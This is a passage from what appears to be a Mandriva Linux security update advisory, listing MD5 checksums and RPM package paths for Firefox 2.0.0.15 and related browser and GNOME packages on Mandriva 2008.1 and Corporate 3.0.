2008.1/i586/mozilla-firefox-lt-2.0.0.15-1mdv2008.1.i586.rpm 25b930f321bf02efbee8fe30cb2d228a 2008.1/i586/mozilla-firefox-mk-2.0.0.15-1mdv2008.1.i586.rpm e600759a5ccbcbde26dc45b04a5c7270 2008.1/i586/mozilla-firefox-mn-2.0.0.15-1mdv2008.1.i586.rpm bd0c7a80958f6bed0376973b508bc94c 2008.1/i586/mozilla-firefox-nb_NO-2.0.0.15-1mdv2008.1.i586.rpm 6fc13439a31de96233f0f10f20dca3d1 2008.1/i586/mozilla-firefox-nl-2.0.0.15-1mdv2008.1.i586.rpm ba535d4a664d01b25e33369aba4986d4 2008.1/i586/mozilla-firefox-nn_NO-2.0.0.15-1mdv2008.1.i586.rpm ef861c8868ab6ddf7c84fca25d1d127c 2008.1/i586/mozilla-firefox-pa_IN-2.0.0.15-1mdv2008.1.i586.rpm 1826fed86563150ce66fb50ae697983f 2008.1/i586/mozilla-firefox-pl-2.0.0.15-1mdv2008.1.i586.rpm 83cb757724527da02d4aa46a7e62308e 2008.1/i586/mozilla-firefox-pt_BR-2.0.0.15-1mdv2008.1.i586.rpm cc60bd8c4da66c1642cc2ea8bf28db0e 2008.1/i586/mozilla-firefox-pt_PT-2.0.0.15-1mdv2008.1.i586.rpm c345cdd0e3c439883d4799fd220ab12a 2008.1/i586/mozilla-firefox-ro-2.0.0.15-1mdv2008.1.i586.rpm ee9ffef046bb11c1e7938af13dfc552f 2008.1/i586/mozilla-firefox-ru-2.0.0.15-1mdv2008.1.i586.rpm 00ddac70e8fd957abbbbb92d21cf2ed0 2008.1/i586/mozilla-firefox-sk-2.0.0.15-1mdv2008.1.i586.rpm 1a9c0212089a0e2f072f12dff11c9841 2008.1/i586/mozilla-firefox-sl-2.0.0.15-1mdv2008.1.i586.rpm 2b82db9c787cc76028fd5be9e85c8e5a 2008.1/i586/mozilla-firefox-sv_SE-2.0.0.15-1mdv2008.1.i586.rpm d0d0b98dba385a5c02545731d0faf19c 2008.1/i586/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.i586.rpm e9cc8f155b04d9b395789966e284e880 2008.1/i586/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.i586.rpm eac092e52f4d0cbbab04b6e213c80d4d 2008.1/i586/mozilla-firefox-tr-2.0.0.15-1mdv2008.1.i586.rpm 17c0a573f824fb10820081f05edc09fb 2008.1/i586/mozilla-firefox-uk-2.0.0.15-1mdv2008.1.i586.rpm 6b78ce63805c643f6369dd3d624007cc 2008.1/i586/mozilla-firefox-zh_CN-2.0.0.15-1mdv2008.1.i586.rpm 8ae13015b9c8bd5004752f305135e0a2 2008.1/i586/mozilla-firefox-zh_TW-2.0.0.15-1mdv2008.1.i586.rpm fc9523830736bce5d7fcfdea3d14b14d 2008.1/i586/totem-2.22.0-4.2mdv2008.1.i586.rpm 45d978213b98d311c49a55bd10d72ea1 2008.1/i586/totem-common-2.22.0-4.2mdv2008.1.i586.rpm d99f127243e382ef97996a00b5237ab5 2008.1/i586/totem-gstreamer-2.22.0-4.2mdv2008.1.i586.rpm fe8d0816fd418f77e32c894182ce7f05 2008.1/i586/totem-mozilla-2.22.0-4.2mdv2008.1.i586.rpm 2fcc504457161d3dc322ee3b48d0c76c 2008.1/i586/totem-mozilla-gstreamer-2.22.0-4.2mdv2008.1.i586.rpm 126d66f0c89bb906d2f6a2bc10719bba 2008.1/i586/yelp-2.22.0-2.2mdv2008.1.i586.rpm 3196744e1e3594540284ad1ada3ca4fb 2008.1/SRPMS/devhelp-0.19-3.2mdv2008.1.src.rpm a5cc93c5bf1460255c9e9fd84cd173bc 2008.1/SRPMS/epiphany-2.22.0-4.2mdv2008.1.src.rpm e888ef9a8bef85515d9c74a6ad8c27f5 2008.1/SRPMS/galeon-2.0.4-3.2mdv2008.1.src.rpm 56e88cd192af2268db247ca2f5c90cd7 2008.1/SRPMS/gluezilla-1.2.6.1-2.2mdv2008.1.src.rpm 99cd4a98919eb78877c2753501c9b122 2008.1/SRPMS/gnome-python-extras-2.19.1-10.2mdv2008.1.src.rpm 415409af7ab11039e61582336090b347 2008.1/SRPMS/mozilla-firefox-2.0.0.15-1.1mdv2008.1.src.rpm a105bac35cd9a4a4832901dfaac96f72 2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.src.rpm a4f2e889fa2c0812c39041feb935ccef 2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.src.rpm 6c72fc55e1cf2d0c9212f96979182202 2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.src.rpm ebb96058ed42569f2ea7a0d613b3e868 2008.1/SRPMS/mozilla-firefox-l10n-2.0.0.15-1mdv2008.1.src.rpm 4f282392c5177706a3f64df3cdb362b7 2008.1/SRPMS/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.src.rpm 9f2b2425c98681a1d4743401300fce76 2008.1/SRPMS/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.src.rpm 9c996ac02a215975ecdc14cb86336cd5 2008.1/SRPMS/totem-2.22.0-4.2mdv2008.1.src.rpm a7285d39afcf1d396cbcf419f37ba4f6 2008.1/SRPMS/yelp-2.22.0-2.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: f634e5629aee78e6cd8e08d22d1626fb 2008.1/x86_64/devhelp-0.19-3.2mdv2008.1.x86_64.rpm dc3eee6ee5db62d21222c23277a1bc1f 2008.1/x86_64/devhelp-plugins-0.19-3.2mdv2008.1.x86_64.rpm b6fcec0f4fd39dcb8ddedbe3879ad522 2008.1/x86_64/epiphany-2.22.0-4.2mdv2008.1.x86_64.rpm f56a1939ae65efe9ee65ed76517ce2e0 2008.1/x86_64/epiphany-devel-2.22.0-4.2mdv2008.1.x86_64.rpm ad79a3e554a0084335543e2e8c51e4cb 2008.1/x86_64/galeon-2.0.4-3.2mdv2008.1.x86_64.rpm bea28a1925d2742f24af8aeb3e35b3a4 2008.1/x86_64/gnome-python-extras-2.19.1-10.2mdv2008.1.x86_64.rpm 71870c1b3229e2f7c503a2d54ffb6352 2008.1/x86_64/gnome-python-gda-2.19.1-10.2mdv2008.1.x86_64.rpm 9c65805404ab4f465fa1e6cde89f24e2 2008.1/x86_64/gnome-python-gda-devel-2.19.1-10.2mdv2008.1.x86_64.rpm e34473eb2ff9b0cbd0b5af51d3c5b617 2008.1/x86_64/gnome-python-gdl-2.19.1-10.2mdv2008.1.x86_64.rpm 36de4f356527891446fdc96c80a16655 2008.1/x86_64/gnome-python-gksu-2.19.1-10.2mdv2008.1.x86_64.rpm fa4569d00f46f71e32f24d58b5838e50 2008.1/x86_64/gnome-python-gtkhtml2-2.19.1-10.2mdv2008.1.x86_64.rpm 569c547c0d42001d38c4ad597c5e5d61 2008.1/x86_64/gnome-python-gtkmozembed-2.19.1-10.2mdv2008.1.x86_64.rpm cc5d5aa3e8333f731014ba223546dd29 2008.1/x86_64/gnome-python-gtkspell-2.19.1-10.2mdv2008.1.x86_64.rpm 685edb52118dc3a909eb27f04a339f31 2008.1/x86_64/lib64devhelp-1_0-0.19-3.2mdv2008.1.x86_64.rpm 0bdf6ec2b01bd5941b308802989334c1 2008.1/x86_64/lib64devhelp-1-devel-0.19-3.2mdv2008.1.x86_64.rpm b1c2188803c0c253fe89379eb5fae59c 2008.1/x86_64/lib64gluezilla0-1.2.6.1-2.2mdv2008.1.x86_64.rpm 9e3735eaa425ade5f915dbec618d4f43 2008.1/x86_64/lib64mozilla-firefox2.0.0.15-2.0.0.15-1.1mdv2008.1.x86_64.rpm 2ebd840b7f80fc9601383e27a644a17c 2008.1/x86_64/lib64mozilla-firefox-devel-2.0.0.15-1.1mdv2008.1.x86_64.rpm 2e4b4c6bc0999fa25211a1b29ea71e31 2008.1/x86_64/mozilla-firefox-2.0.0.15-1.1mdv2008.1.x86_64.rpm c6b0b6bb0d8309ce3f40162b564783e6 2008.1/x86_64/mozilla-firefox-af-2.0.0.15-1mdv2008.1.x86_64.rpm 5c20fa3dcccae535c3b0eb761de9c037 2008.1/x86_64/mozilla-firefox-ar-2.0.0.15-1mdv2008.1.x86_64.rpm 39d48ecd7d20e545bf3136b488b0f5b8 2008.1/x86_64/mozilla-firefox-be-2.0.0.15-1mdv2008.1.x86_64.rpm ebc55186b6c8a7ef8db8c0e70311accc 2008.1/x86_64/mozilla-firefox-bg-2.0.0.15-1mdv2008.1.x86_64.rpm 81aebd660acf8fb3974c0af8d6ebb208 2008.1/x86_64/mozilla-firefox-br_FR-2.0.0.15-1mdv2008.1.x86_64.rpm 66dd1d068a46659d617373d0a2714417 2008.1/x86_64/mozilla-firefox-ca-2.0.0.15-1mdv2008.1.x86_64.rpm 5a206d036a8839d35dfbca5161f35e3c 2008.1/x86_64/mozilla-firefox-cs-2.0.0.15-1mdv2008.1.x86_64.rpm 4bfcb67516ea3be0fb325c48706a74b1 2008.1/x86_64/mozilla-firefox-da-2.0.0.15-1mdv2008.1.x86_64.rpm 66424b46727f556a4d27197b31882de8 2008.1/x86_64/mozilla-firefox-de-2.0.0.15-1mdv2008.1.x86_64.rpm f4002640c6c47845c6ccd1e6f39100d0 2008.1/x86_64/mozilla-firefox-el-2.0.0.15-1mdv2008.1.x86_64.rpm ef2141268bb22e3091c1af08c6499fe5 2008.1/x86_64/mozilla-firefox-en_GB-2.0.0.15-1mdv2008.1.x86_64.rpm c349744113dd7a0e0eb4a829b3d422be 2008.1/x86_64/mozilla-firefox-es_AR-2.0.0.15-1mdv2008.1.x86_64.rpm f2d4a5ae4fc8beb76eadab57ea37e8ba 2008.1/x86_64/mozilla-firefox-es_ES-2.0.0.15-1mdv2008.1.x86_64.rpm 0dbd3f8c42fc0121d13372548f9254b8 2008.1/x86_64/mozilla-firefox-et_EE-2.0.0.15-1mdv2008.1.x86_64.rpm 5cdf4de54e7024179128b796ae492f11 2008.1/x86_64/mozilla-firefox-eu-2.0.0.15-1mdv2008.1.x86_64.rpm 0a4929c289299ae720bc3062c7c1a98d 2008.1/x86_64/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.x86_64.rpm 3cccde3949b07102f3f9384b32563c10 2008.1/x86_64/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.x86_64.rpm 9efd9c25d5440b168ce2cf226ef6ebd9 2008.1/x86_64/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.x86_64.rpm 1551a0840dd18b65827b9a59af4f80a2 2008.1/x86_64/mozilla-firefox-fi-2.0.0.15-1mdv2008.1.x86_64.rpm 67816be6027625b80825b5db024e7ca7 2008.1/x86_64/mozilla-firefox-fr-2.0.0.15-1mdv2008.1.x86_64.rpm afdbd5d9b2e6e5c69b07e7c326e3d880 2008.1/x86_64/mozilla-firefox-fy-2.0.0.15-1mdv2008.1.x86_64.rpm 3b6fc0522bfdb0ed2617df2186488e62 2008.1/x86_64/mozilla-firefox-ga-2.0.0.15-1mdv2008.1.x86_64.rpm 12a0a359ccda2393129c30a44015bae1 2008.1/x86_64/mozilla-firefox-gnome-support-2.0.0.15-1.1mdv2008.1.x86_64.rpm fe6b15f455bdc581b3d71db753178370 2008.1/x86_64/mozilla-firefox-gu_IN-2.0.0.15-1mdv2008.1.x86_64.rpm 5511002085fb74189433ad6805886614 2008.1/x86_64/mozilla-firefox-he-2.0.0.15-1mdv2008.1.x86_64.rpm 24957f0408e3dc30c3fc9903458d805b 2008.1/x86_64/mozilla-firefox-hu-2.0.0.15-1mdv2008.1.x86_64.rpm aa57fc3c315d61de4ff7cb08cb3fb10b 2008.1/x86_64/mozilla-firefox-it-2.0.0.15-1mdv2008.1.x86_64.rpm d901d5ba293ba69a3b37eeb2ac596cbf 2008.1/x86_64/mozilla-firefox-ja-2.0.0.15-1mdv2008.1.x86_64.rpm 9cdd9eae53286c1ef9a82620401c08dc 2008.1/x86_64/mozilla-firefox-ka-2.0.0.15-1mdv2008.1.x86_64.rpm c18344b16974c940a593a6fd40b13530 2008.1/x86_64/mozilla-firefox-ko-2.0.0.15-1mdv2008.1.x86_64.rpm 6f5d7b5f7f09e14f70498f67b61e392f 2008.1/x86_64/mozilla-firefox-ku-2.0.0.15-1mdv2008.1.x86_64.rpm 2f61b6499fa96286b9098ba9ec2760f4 2008.1/x86_64/mozilla-firefox-lt-2.0.0.15-1mdv2008.1.x86_64.rpm 3ff58be9d71630a2e8c127ba204c6459 2008.1/x86_64/mozilla-firefox-mk-2.0.0.15-1mdv2008.1.x86_64.rpm fd44fb8c74d5c0f0190c2d1ac812234f 2008.1/x86_64/mozilla-firefox-mn-2.0.0.15-1mdv2008.1.x86_64.rpm 24ab94819a38619b96e59888cf4b4c5a 2008.1/x86_64/mozilla-firefox-nb_NO-2.0.0.15-1mdv2008.1.x86_64.rpm 3902587245aaeaa3bfdd22cffe45f0c7 2008.1/x86_64/mozilla-firefox-nl-2.0.0.15-1mdv2008.1.x86_64.rpm d98511e7142f6656c3540ace6e3c2074 2008.1/x86_64/mozilla-firefox-nn_NO-2.0.0.15-1mdv2008.1.x86_64.rpm d29f19f8d7af9b9cea380f413c3cc430 2008.1/x86_64/mozilla-firefox-pa_IN-2.0.0.15-1mdv2008.1.x86_64.rpm 6c15753f17c58e4d24a6da564a331f1f 2008.1/x86_64/mozilla-firefox-pl-2.0.0.15-1mdv2008.1.x86_64.rpm bf96bc723c8ebcf5fa75a583312a6adf 2008.1/x86_64/mozilla-firefox-pt_BR-2.0.0.15-1mdv2008.1.x86_64.rpm a5f989d8309611955e4e00e8f852cc50 2008.1/x86_64/mozilla-firefox-pt_PT-2.0.0.15-1mdv2008.1.x86_64.rpm 345a328dbbcde67d73b46fd8bc9a5e93 2008.1/x86_64/mozilla-firefox-ro-2.0.0.15-1mdv2008.1.x86_64.rpm 3f488dedbc4f64d2a2db19882a653f36 2008.1/x86_64/mozilla-firefox-ru-2.0.0.15-1mdv2008.1.x86_64.rpm c75225da56c47187e151350896cf5c42 2008.1/x86_64/mozilla-firefox-sk-2.0.0.15-1mdv2008.1.x86_64.rpm 798186b190d46bfbbfcd684d0c69a1e9 2008.1/x86_64/mozilla-firefox-sl-2.0.0.15-1mdv2008.1.x86_64.rpm cf7dc2a91c88112af38c69c0c58c4995 2008.1/x86_64/mozilla-firefox-sv_SE-2.0.0.15-1mdv2008.1.x86_64.rpm 7b0054a3a1f901be2dbed7c9366f79a3 2008.1/x86_64/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.x86_64.rpm 828cb88707ad3beed0d794c6da2503e7 2008.1/x86_64/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.x86_64.rpm 7fc01e6ff956054524030c789c33dbe7 2008.1/x86_64/mozilla-firefox-tr-2.0.0.15-1mdv2008.1.x86_64.rpm 438b697762f6f939e78a4802742f17e5 2008.1/x86_64/mozilla-firefox-uk-2.0.0.15-1mdv2008.1.x86_64.rpm 84382017a3406d68dea7a5e84bb9c528 2008.1/x86_64/mozilla-firefox-zh_CN-2.0.0.15-1mdv2008.1.x86_64.rpm ab0e91b7f9287fc0955b5af61725e4e7 2008.1/x86_64/mozilla-firefox-zh_TW-2.0.0.15-1mdv2008.1.x86_64.rpm 53caeb79adedeeb098ff6f1cc2a01e8d 2008.1/x86_64/totem-2.22.0-4.2mdv2008.1.x86_64.rpm ba2712447171bfe1dc143d318075ea10 2008.1/x86_64/totem-common-2.22.0-4.2mdv2008.1.x86_64.rpm 650493aa0c5c00d1dcef7d8808a75108 2008.1/x86_64/totem-gstreamer-2.22.0-4.2mdv2008.1.x86_64.rpm 2b6bf2398c7d9d14583e43b860516bff 2008.1/x86_64/totem-mozilla-2.22.0-4.2mdv2008.1.x86_64.rpm c56af8589581f03fb839952225adbca0 2008.1/x86_64/totem-mozilla-gstreamer-2.22.0-4.2mdv2008.1.x86_64.rpm 3a0c3df94871e5fc48cd6e8fec1efc48 2008.1/x86_64/yelp-2.22.0-2.2mdv2008.1.x86_64.rpm 3196744e1e3594540284ad1ada3ca4fb 2008.1/SRPMS/devhelp-0.19-3.2mdv2008.1.src.rpm a5cc93c5bf1460255c9e9fd84cd173bc 2008.1/SRPMS/epiphany-2.22.0-4.2mdv2008.1.src.rpm e888ef9a8bef85515d9c74a6ad8c27f5 2008.1/SRPMS/galeon-2.0.4-3.2mdv2008.1.src.rpm 56e88cd192af2268db247ca2f5c90cd7 2008.1/SRPMS/gluezilla-1.2.6.1-2.2mdv2008.1.src.rpm 99cd4a98919eb78877c2753501c9b122 2008.1/SRPMS/gnome-python-extras-2.19.1-10.2mdv2008.1.src.rpm 415409af7ab11039e61582336090b347 2008.1/SRPMS/mozilla-firefox-2.0.0.15-1.1mdv2008.1.src.rpm a105bac35cd9a4a4832901dfaac96f72 2008.1/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.src.rpm a4f2e889fa2c0812c39041feb935ccef 2008.1/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.src.rpm 6c72fc55e1cf2d0c9212f96979182202 2008.1/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.src.rpm ebb96058ed42569f2ea7a0d613b3e868 2008.1/SRPMS/mozilla-firefox-l10n-2.0.0.15-1mdv2008.1.src.rpm 4f282392c5177706a3f64df3cdb362b7 2008.1/SRPMS/mozilla-firefox-theme-gnome-2.0.0-7mdv2008.1.src.rpm 9f2b2425c98681a1d4743401300fce76 2008.1/SRPMS/mozilla-firefox-theme-kdeff-0.4-7mdv2008.1.src.rpm 9c996ac02a215975ecdc14cb86336cd5 2008.1/SRPMS/totem-2.22.0-4.2mdv2008.1.src.rpm a7285d39afcf1d396cbcf419f37ba4f6 2008.1/SRPMS/yelp-2.22.0-2.2mdv2008.1.src.rpm Corporate 3.0: ef75f05ce92edf53c56bfa7e93009bf2 corporate/3.0/i586/libnspr4-2.0.0.15-0.1.C30mdk.i586.rpm a3fa368f19fde843dd95a5b8fcc98def corporate/3.0/i586/libnspr4-devel-2.0.0.15-0.1.C30mdk.i586.rpm f2dc04a411983213526b6300fd440966 corporate/3.0/i586/libnspr4-static-devel-2.0.0.15-0.1.C30mdk.i586.rpm 636afda2ac271d5f573ecd6a9af2425a corporate/3.0/i586/libnss3-2.0.0.15-0.1.C30mdk.i586.rpm 79467b8c2dfbad978e2df70d7f991dd1 corporate/3.0/i586/libnss3-devel-2.0.0.15-0.1.C30mdk.i586.rpm 584d239bf6274470c0830cc5a5466376 corporate/3.0/i586/mozilla-firefox-2.0.0.15-0.1.C30mdk.i586.rpm 39b48b3a3e3f0d5cdba5b100f0939d20 corporate/3.0/i586/mozilla-firefox-ar-2.0.0.15-0.1.C30mdk.i586.rpm 4041354006e8ca5045b83fb87d5c09a7 corporate/3.0/i586/mozilla-firefox-bg-2.0.0.15-0.1.C30mdk.i586.rpm d56332790506a07adf73b1b93d70f261 corporate/3.0/i586/mozilla-firefox-br-2.0.0.15-0.1.C30mdk.i586.rpm b5e277eb20970d61b5953832abe21f97 corporate/3.0/i586/mozilla-firefox-ca-2.0.0.15-0.1.C30mdk.i586.rpm 6759b8e97693cac73b11f670febb3c6c corporate/3.0/i586/mozilla-firefox-cs-2.0.0.15-0.1.C30mdk.i586.rpm 27fe969d9531353e0c9321cfd9945c96 corporate/3.0/i586/mozilla-firefox-da-2.0.0.15-0.1.C30mdk.i586.rpm 7b279caff391841a9ac3aeddd2c38212 corporate/3.0/i586/mozilla-firefox-de-2.0.0.15-0.1.C30mdk.i586.rpm f51b7d8acb9bc9c53f15ea23d8760d63 corporate/3.0/i586/mozilla-firefox-devel-2.0.0.15-0.1.C30mdk.i586.rpm fc9fa23d4e1c223afbef3d0e581605ac corporate/3.0/i586/mozilla-firefox-el-2.0.0.15-0.1.C30mdk.i586.rpm 8289a4c1e73cd0f23cedccb33ca9ed42 corporate/3.0/i586/mozilla-firefox-es-2.0.0.15-0.1.C30mdk.i586.rpm 6ead96bbbffbefb5e7e7f8e574fbcf27 corporate/3.0/i586/mozilla-firefox-es_AR-2.0.0.15-0.1.C30mdk.i586.rpm 051f093598c6c34342bf2c80e02fc1b9 corporate/3.0/i586/mozilla-firefox-eu-2.0.0.15-0.1.C30mdk.i586.rpm d3166a7dcc36db911045b865143a6958 corporate/3.0/i586/mozilla-firefox-fi-2.0.0.15-0.1.C30mdk.i586.rpm a8856d1ccddd8336185c42fc582b57ce corporate/3.0/i586/mozilla-firefox-fr-2.0.0.15-0.1.C30mdk.i586.rpm 5a7a0fd04a89eab4ff6ad4cf6087068d corporate/3.0/i586/mozilla-firefox-fy-2.0.0.15-0.1.C30mdk.i586.rpm 2e5f8b99e783fa83a7780f4f634e6234 corporate/3.0/i586/mozilla-firefox-ga-2.0.0.15-0.1.C30mdk.i586.rpm ae4b5362240e0d673dad7744648fa31b corporate/3.0/i586/mozilla-firefox-gu_IN-2.0.0.15-0.1.C30mdk.i586.rpm ca07409227067edb78ff98ac2cda30ce corporate/3.0/i586/mozilla-firefox-he-2.0.0.15-0.1.C30mdk.i586.rpm b6fc3c224b90e3e8a5182afb7029f9ba corporate/3.0/i586/mozilla-firefox-hu-2.0.0.15-0.1.C30mdk.i586.rpm 814b8a0f2f24141b56584804efdd5ecd corporate/3.0/i586/mozilla-firefox-it-2.0.0.15-0.1.C30mdk.i586.rpm a3d8e5ec418421e5547dc7512f4599e6 corporate/3.0/i586/mozilla-firefox-ja-2.0.0.15-0.1.C30mdk.i586.rpm d3e59bd35273b8e9b34bca0d553c22b4 corporate/3.0/i586/mozilla-firefox-ko-2.0.0.15-0.1.C30mdk.i586.rpm 3af743b17ba6954e9d77c87e89bd0128 corporate/3.0/i586/mozilla-firefox-lt-2.0.0.15-0.1.C30mdk.i586.rpm c32d88e756fb9fd578583b5c10170311 corporate/3.0/i586/mozilla-firefox-mk-2.0.0.15-0.1.C30mdk.i586.rpm 5309d13216e4fef73dfd738952ddcc39 corporate/3.0/i586/mozilla-firefox-nb-2.0.0.15-0.1.C30mdk.i586.rpm 926325f90f8f97870155078c863ea57a corporate/3.0/i586/mozilla-firefox-nl-2.0.0.15-0.1.C30mdk.i586.rpm c21554d42ebc29769fbf941c1660b037 corporate/3.0/i586/mozilla-firefox-pa_IN-2.0.0.15-0.1.C30mdk.i586.rpm 53e722a03b25df282eeffc45508b90e1 corporate/3.0/i586/mozilla-firefox-pl-2.0.0.15-0.1.C30mdk.i586.rpm 9cdf239ed95a3a49d0e63399a86eef82 corporate/3.0/i586/mozilla-firefox-pt-2.0.0.15-0.1.C30mdk.i586.rpm 9942460a55172d86b65004b84161d54b corporate/3.0/i586/mozilla-firefox-pt_BR-2.0.0.15-0.1.C30mdk.i586.rpm 015c1f46f027a3db40a9eb998a0a783b corporate/3.0/i586/mozilla-firefox-ro-2.0.0.15-0.1.C30mdk.i586.rpm 73cdfdb1faa612f708366448e82beffe corporate/3.0/i586/mozilla-firefox-ru-2.0.0.15-0.1.C30mdk.i586.rpm 0f385398f5fd0448a5bc0baf45e2719f corporate/3.0/i586/mozilla-firefox-sk-2.0.0.15-0.1.C30mdk.i586.rpm cdb8ef12da908724c15d1d4f4dc890bc corporate/3.0/i586/mozilla-firefox-sl-2.0.0.15-0.1.C30mdk.i586.rpm 2cfe3e49d01019d141cb62143d3b6bb1 corporate/3.0/i586/mozilla-firefox-sv-2.0.0.15-0.1.C30mdk.i586.rpm 1ec32eb7ccd87c7138c9f2a65e8cc451 corporate/3.0/i586/mozilla-firefox-tr-2.0.0.15-0.1.C30mdk.i586.rpm bcb6a277b2cc22c93e7d97f408d35fd3 corporate/3.0/i586/mozilla-firefox-uk-2.0.0.15-0.1.C30mdk.i586.rpm 05cb84123d67709136944238a3a7b47e corporate/3.0/i586/mozilla-firefox-zh_CN-2.0.0.15-0.1.C30mdk.i586.rpm 9d14565763dfceb45c8af92236f1995e corporate/3.0/i586/mozilla-firefox-zh_TW-2.0.0.15-0.1.C30mdk.i586.rpm ee1e837a087dbd3df1767c85301c4655 corporate/3.0/SRPMS/mozilla-firefox-2.0.0.15-0.1.C30mdk.src.rpm ee2a600a518aaae667977510c8b2b1d3 corporate/3.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: f0093a0056eb4d99a3366f63f16fec88 corporate/3.0/x86_64/lib64nspr4-2.0.0.15-0.1.C30mdk.x86_64.rpm 1d5fe9532d7327c95a5eccdd54d5cf50 corporate/3.0/x86_64/lib64nspr4-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm fcc4d2d271eff505ab104aa55f78f3dc corporate/3.0/x86_64/lib64nspr4-static-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm 88bd58d55555a946d9b46c2ed65823b2 corporate/3.0/x86_64/lib64nss3-2.0.0.15-0.1.C30mdk.x86_64.rpm f3d4b77ba1f1bd35888aee892ef8b849 corporate/3.0/x86_64/lib64nss3-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm 96509380961504faf309bffbaa58e5c6 corporate/3.0/x86_64/mozilla-firefox-2.0.0.15-0.1.C30mdk.x86_64.rpm 04c6c6d88adf4397a378df1a13f37997 corporate/3.0/x86_64/mozilla-firefox-ar-2.0.0.15-0.1.C30mdk.x86_64.rpm 833aaa2eb32dcaa8fab0a6119d85b3f9 corporate/3.0/x86_64/mozilla-firefox-bg-2.0.0.15-0.1.C30mdk.x86_64.rpm e8d1d92dadd35788afe5ea2561628dc6 corporate/3.0/x86_64/mozilla-firefox-br-2.0.0.15-0.1.C30mdk.x86_64.rpm d56ac1b418d988a03ad6a6c6ce2118e5 corporate/3.0/x86_64/mozilla-firefox-ca-2.0.0.15-0.1.C30mdk.x86_64.rpm 443572a6ab6ca5b96c4bd5b278b1c1f5 corporate/3.0/x86_64/mozilla-firefox-cs-2.0.0.15-0.1.C30mdk.x86_64.rpm 71d1eb73f9c538453feb682a90cd7e87 corporate/3.0/x86_64/mozilla-firefox-da-2.0.0.15-0.1.C30mdk.x86_64.rpm 1f8217d0d6a96cda43a7259add4f6b70 corporate/3.0/x86_64/mozilla-firefox-de-2.0.0.15-0.1.C30mdk.x86_64.rpm 5999334dda00d8362985ab7404a4556c corporate/3.0/x86_64/mozilla-firefox-devel-2.0.0.15-0.1.C30mdk.x86_64.rpm 0f845fc76d2e9e52fdb596422cabf57b corporate/3.0/x86_64/mozilla-firefox-el-2.0.0.15-0.1.C30mdk.x86_64.rpm 1553954278c975e95fac7eb44d833561 corporate/3.0/x86_64/mozilla-firefox-es-2.0.0.15-0.1.C30mdk.x86_64.rpm 56bfa14e2cdf1682a7d9fb7da53160f8 corporate/3.0/x86_64/mozilla-firefox-es_AR-2.0.0.15-0.1.C30mdk.x86_64.rpm 81ecfa18d14d05dc8da02ba2b12270cc corporate/3.0/x86_64/mozilla-firefox-eu-2.0.0.15-0.1.C30mdk.x86_64.rpm b86a49b8c4deaaadad670ede76e7bf24 corporate/3.0/x86_64/mozilla-firefox-fi-2.0.0.15-0.1.C30mdk.x86_64.rpm 67e32edd23831a3032230c3bb65657a1 corporate/3.0/x86_64/mozilla-firefox-fr-2.0.0.15-0.1.C30mdk.x86_64.rpm e96a1383ea824ae60605a5d5dbbfb77e corporate/3.0/x86_64/mozilla-firefox-fy-2.0.0.15-0.1.C30mdk.x86_64.rpm 2460f98d8c33f09e562cf24b62463ae2 corporate/3.0/x86_64/mozilla-firefox-ga-2.0.0.15-0.1.C30mdk.x86_64.rpm 74e9ffe11a35a8145f926a46d509c054 corporate/3.0/x86_64/mozilla-firefox-gu_IN-2.0.0.15-0.1.C30mdk.x86_64.rpm 7a22099952af5cb2f5a899b64c9d069a corporate/3.0/x86_64/mozilla-firefox-he-2.0.0.15-0.1.C30mdk.x86_64.rpm 0b30326208689cebbaa585381f0f04ea corporate/3.0/x86_64/mozilla-firefox-hu-2.0.0.15-0.1.C30mdk.x86_64.rpm 953db42f551b2ee3324bc30f6e3edc08 corporate/3.0/x86_64/mozilla-firefox-it-2.0.0.15-0.1.C30mdk.x86_64.rpm 39277f6ab24b862b8cf5df8ed2e8888d corporate/3.0/x86_64/mozilla-firefox-ja-2.0.0.15-0.1.C30mdk.x86_64.rpm 8541c41dc6e7b65d9964cf19c9c524f5 corporate/3.0/x86_64/mozilla-firefox-ko-2.0.0.15-0.1.C30mdk.x86_64.rpm 49125ba4c24fa594036f05a2bf106442 corporate/3.0/x86_64/mozilla-firefox-lt-2.0.0.15-0.1.C30mdk.x86_64.rpm 0be0444c8283beb062b2ca7b1dfa5ce7 corporate/3.0/x86_64/mozilla-firefox-mk-2.0.0.15-0.1.C30mdk.x86_64.rpm 937fd6e895222f44545cbcc05f208e9f corporate/3.0/x86_64/mozilla-firefox-nb-2.0.0.15-0.1.C30mdk.x86_64.rpm 3c74fd997e2f66a5eec63a25ebecdcbc corporate/3.0/x86_64/mozilla-firefox-nl-2.0.0.15-0.1.C30mdk.x86_64.rpm 650a2cb145d6326d8c62deab46ff8a9d corporate/3.0/x86_64/mozilla-firefox-pa_IN-2.0.0.15-0.1.C30mdk.x86_64.rpm 9562d7234d395ee2cfbeb3cc1e2ba1c9 corporate/3.0/x86_64/mozilla-firefox-pl-2.0.0.15-0.1.C30mdk.x86_64.rpm 599b6a0e6aef31a4a71aa2fcdab19abc corporate/3.0/x86_64/mozilla-firefox-pt-2.0.0.15-0.1.C30mdk.x86_64.rpm 2e4b432d301caf710d024ed7860293fc corporate/3.0/x86_64/mozilla-firefox-pt_BR-2.0.0.15-0.1.C30mdk.x86_64.rpm 5b34c8dfb0409f5d5f9eaaf4d65b727d corporate/3.0/x86_64/mozilla-firefox-ro-2.0.0.15-0.1.C30mdk.x86_64.rpm 759da9f683109581376d7be29bea7803 